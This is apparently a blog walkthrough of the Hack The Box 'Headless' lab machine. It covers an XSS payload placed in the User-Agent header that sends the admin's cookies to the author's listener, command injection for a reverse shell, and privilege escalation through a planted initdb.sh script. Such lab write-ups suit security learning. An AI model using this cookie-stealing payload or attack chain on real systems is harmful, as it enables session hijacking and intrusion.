Headless | Hack The Box Walk through
Hello Guys,
It’s me Bikram Kharal back in medium to write about the Seasonal machine of the Hack The Box.
Initial Enumeration
First of all i did a simple nmap scan to enumerate all the ports in the box.
nmap -sC -sV Machine_IP -T4
I found that open ports are 22 and 5000.
I saw that port 5000 is running a web service.Visiting that location we got a interface like below:
Clicking on For questions
button we got a interface to contact support.
By seeing this page i started adding random values and intercepted the proxy with burpsuite.
When i added a simple XSS payload in message section we got prompted with ‘Hacking Attempt Detected.
I suspected that this web service was vulnerable to XSS vulnerability.But no any value send via contact support are getting reflected.
After researching for few minutes , I tried injecting XSS payload in the User-Agent Section and surprisingly it got fired.
Now we need to find and construct a XSS payload to steal the cookies of an admin.
After adding below payload on the User-Agent and i started my python server as shown below.
<img src=x onerror=document.location="http://10.10.14.57:8000/?c="+document.cookie>
And finally we got admin cookie.
Using admin cookie i again tried to bruteforce the directory if we could get useful path using ffuf.
Yes, We got /dashboard path using the admin cookie.
I tried to access the dashboard and interface was like:
I clicked on Generate Report
button and intercepted the request with burp proxy.
I initially I tried to inject command injection payload and we got the response immediately.
Now it’s time to get reverse shell :)
Going 1 directory back we got a user.txt
Post Exploitation
I tried basic Linux privilege escalation techniques.Using sudo -l
we found that `usr/bin/syscheck` without sudo password.
Reading the code of syscheck
file i found that it is running `initdb.sh` file with sudo privilege.
I instantly created a new file called initdb.sh
with reverse shell payload and i runned that /usr/bin/syscheck
file and we got our shell with sudo privilege.
Thank you all for reading.
Till then Happy Hacking :)